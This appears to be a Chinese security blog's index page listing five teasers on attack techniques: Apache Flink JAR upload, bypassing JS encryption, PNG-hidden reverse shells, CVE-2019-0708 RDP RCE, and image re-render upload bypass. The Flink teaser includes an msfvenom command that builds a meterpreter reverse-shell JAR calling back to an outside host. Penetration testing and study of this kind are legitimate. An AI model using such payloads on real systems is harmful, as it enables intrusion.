Apache Flink 任意JAR包上传

    Apache Flink 任意JAR包上传
    时间2019-11-15影响范围:<=1.9.1 点击overview,可以看到当前版本,下面演示的是1.8.0 1.先通过msf生成一个jar包msfvenom -p java/meterpreter/reverse_tcp lhost=1.1.1.1 lport=53 -f jar > msf.jar……继续阅读 »

    lz520520 5年前 (2019-11-15) 688浏览 3个赞

    前端JS加密绕过:jsEncrypter

    前端JS加密绕过:jsEncrypter
    0x00 准备首先需要下载两个程序burp插件 jsEncrypter:https://github.com/c0ny1/jsEncrypter/releases解析js的无头浏览器:https://phantomjs.org/download.html 简单讲下原理,其实就是用phantomjs搭建一个本地js服务器,里面有前端网页使用……继续阅读 »

    lz520520 5年前 (2019-11-08) 1172浏览 0个赞

    【学习】利用png隐藏payload反弹shell

    【学习】利用png隐藏payload反弹shell
    0x00 前言最近看到一篇微信文章说是可以利用png反弹shell,我还以为图片查看器有什么漏洞,可以在png植入payload然后执行的。最后测试复现不了,然后分析了下ps脚本,原来只是利用了一种图片隐写术,将payload隐藏到png图片里,然后再通过提供的powershell命令去提取png中的payload运行,最后实现了反弹shell,而那篇文……继续阅读 »

    lz520520 5年前 (2019-10-09) 1209浏览 0个赞

    【漏洞】CVE-2019-0708(RDP RCE)漏洞复现

    【漏洞】CVE-2019-0708(RDP RCE)漏洞复现
    9.25最近看了关于这个msf更新的exp的分析文章,了解到为什么容易蓝屏。简单来说就是由于UAF漏洞IcaChannelInputInternal->IcaFindChannel会返回一个指向的内容已经被释放了的指针,随后有一处间接调用,通过喷射占位让这里的rax寄存器指向我们的shellcode就可以RCE。在windows 7上,非分页内存的……继续阅读 »

    lz520520 5年前 (2019-10-06) 885浏览 0个赞

    文件上传-二次渲染绕过

    文件上传-二次渲染绕过
    所谓二次渲染:就是根据用户上传的图片,新生成一个图片,将原始图片删除,将新图片添加到数据库中。比如一些网站根据用户上传的头像生成大中小不同尺寸的图像。特点:无法通过普通的绕过方式进行上传,php代码会检测你传过去的数据流,如果检测不符合png、jpg、gif格式的话就会直接报错,如果上传成功之后,PHP会根据你的数据来生成新的特定jpg文件。并且利用时间戳……继续阅读 »

    lz520520 5年前 (2019-10-06) 1048浏览 1个赞